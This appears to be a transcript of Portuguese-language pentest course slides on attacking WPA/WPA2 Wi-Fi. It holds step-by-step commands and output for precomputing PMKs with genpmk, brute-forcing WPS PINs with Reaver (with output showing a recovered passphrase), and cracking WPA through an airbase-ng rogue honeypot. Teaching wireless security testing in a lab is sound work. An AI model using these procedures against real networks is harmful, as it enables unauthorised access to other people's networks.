WPA-WPA2

47
Wireless Pentest WPA & WPA2

description

WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2WPA-WPA2

Transcript of WPA-WPA2

Page 1: WPA-WPA2

Wireless Pentest

WPA & WPA2

Page 2: WPA-WPA2

Instrutor

Marcos [email protected]

Page 3: WPA-WPA2

Wireless Protected Access

Page 4: WPA-WPA2
Page 5: WPA-WPA2
Page 6: WPA-WPA2
Page 7: WPA-WPA2
Page 8: WPA-WPA2
Page 9: WPA-WPA2
Page 10: WPA-WPA2
Page 11: WPA-WPA2
Page 12: WPA-WPA2
Page 13: WPA-WPA2
Page 14: WPA-WPA2
Page 15: WPA-WPA2

Um pouco mais de teoria…

Page 16: WPA-WPA2
Page 17: WPA-WPA2

WPA - Pre-Shared Key

Page 18: WPA-WPA2

WPA - Pre-Shared Key

Page 19: WPA-WPA2
Page 20: WPA-WPA2
Page 21: WPA-WPA2
Page 22: WPA-WPA2
Page 23: WPA-WPA2
Page 24: WPA-WPA2
Page 25: WPA-WPA2
Page 26: WPA-WPA2

Um pouco mais de teoria…

Page 27: WPA-WPA2

Um pouco mais de teoria…

Page 28: WPA-WPA2

Ataque WPA

Page 29: WPA-WPA2

Ataque WPA

Page 30: WPA-WPA2

Ataque WPA

Page 31: WPA-WPA2

Ataque WPA

Page 32: WPA-WPA2

Ataque WPA

Page 33: WPA-WPA2

Decriptando WPA - PSK

Page 34: WPA-WPA2

WPA2 - PSK

• Usa os mesmos princípios do WPA• A fraqueza é baseada na frase escolhida• Mais nada a ser dito !!!!!• Procedimento igual ao anterior

Page 35: WPA-WPA2

Acelerando o processo de Cracking

• Nós podemos pré-calcular a PMK para um dado SSID e uma wordlist usando a ferramenta genpmk

• genpmk -f /pentest/passwords/wordlists/darkc0de. lst -d PMK-Wireless-Lab -s "Wireless Lab“

• Vamos criar uma rede WPA-PSK com a senha skysign e capture o WPA-handshake desta rede

Page 36: WPA-WPA2

Acelerando o processo de Cracking

Page 37: WPA-WPA2

Meça o tempo levado com aircrack e compare…

Page 38: WPA-WPA2

Usando PMK com aircrack

Page 39: WPA-WPA2

Pyrit para sistemas MultiCPU

Page 40: WPA-WPA2

Como o Reaver funciona?

• Explora a vulnerabilidade no WPS – Wi-Fi Protected Setup (WPS)• Força bruta em PIN’s para relevar as senhas do WPA ou WPA2• Leva de 4 a 10 horas• Não funciona em todos os AP’s

Page 41: WPA-WPA2

Crackeando via Reaver1)airmon-ng start wlan02) airodump-ng mon0No outro terminal3) root@bt:~# reaver -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv

Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 34:08:04:C0:B6:4E[+] Switching mon0 to channel 11[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[!] WARNING: Receive timeout occurred[+] Sending WSC NACK[!] WPS transaction failed (code: 0x02), re-trying last pin[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message

Page 42: WPA-WPA2

Crackeando via Reaverroot@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -v

Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 34:08:04:C0:B6:4E

[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)[+] Trying pin 12345670

[+] Trying pin 00005678[+] Trying pin 01235678[+] Trying pin 11115670[+] Trying pin 22225672[+] Trying pin 33335674[+] 0.05% complete @ 2012-05-07 20:43:57 (3 seconds/pin)[+] Trying pin 44445676[+] Trying pin 55555678[+] Trying pin 66665670[+] Trying pin 77775672[+] Trying pin 88885674[+] 0.10% complete @ 2012-05-07 20:44:14 (3 seconds/pin)[+] Trying pin 99995676[+] Trying pin 00015677[+] Trying pin 00025676[+] Trying pin 00035675

Page 43: WPA-WPA2

Crackeando via Reaver• root@bt:~# reaver -S -c 11 -a -i mon0 -b 34:08:04:C0:B6:4E -vv -p 22838353

Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Switching mon0 to channel 11[+] Waiting for beacon from 34:08:04:C0:B6:4E[+] Associated with 34:08:04:C0:B6:4E (ESSID: multipinguim-2)

[+] Trying pin 22838353[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response[+] Received M1 message[+] Sending M2 message

[+] Received M3 message[+] Sending M4 message[+] Received M5 message[+] Sending M6 message[+] Received M7 message[+] Sending WSC NACK[+] Sending WSC NACK[+] Pin cracked in 3 seconds[+] WPS PIN: '22838353'[+] WPA PSK: 'DECADA1234'[+] AP SSID: 'multipinguim-2'[+] Nothing done, nothing to save.

Page 44: WPA-WPA2

Conectando a uma rede WPAwpa-supp.conf

Page 45: WPA-WPA2

Conectando a uma rede WPA

Page 46: WPA-WPA2

Cracking AP-less WPA Personal

• Para fazermos um crack no WPA precisamos do 4 handshake:– Authenticator Nounce, Supplicante Nounce, Authenticator MAC, Supplicant

MAC.– Só que para este ataque não precisamos de todos estes pacotes:

• Ou pacote 1 & 2 ou pacotes 2 & 3

• Para crackear precisamos então do WPA-PSK honeypot para então ele conectar-se, somente precisamos da msg 1 e msg 2.

• Não precisamos saber nenhuma frase secreta ;-)

Page 47: WPA-WPA2

Cracking AP-less WPA Personal

1) Configurando nosso honeypot airbase-ng -c 3 -a <AP> -e “Wireless Lab” -W 1 -z 2 mon0

2) Iniciamos o airodumpairodumo-ng -c 3 –bssid <AP> --write sem-AP-WPA-cracking mon0

3) Volte a tela do airbase e observe os clientes se associando4) Volte a tela do airodump e veja se pegou o WPA Handshake5) Rode o aircrack agoraaircrack-ng -w wordlist.txt -b <AP> sem-AP-WPA-cracking-01.cap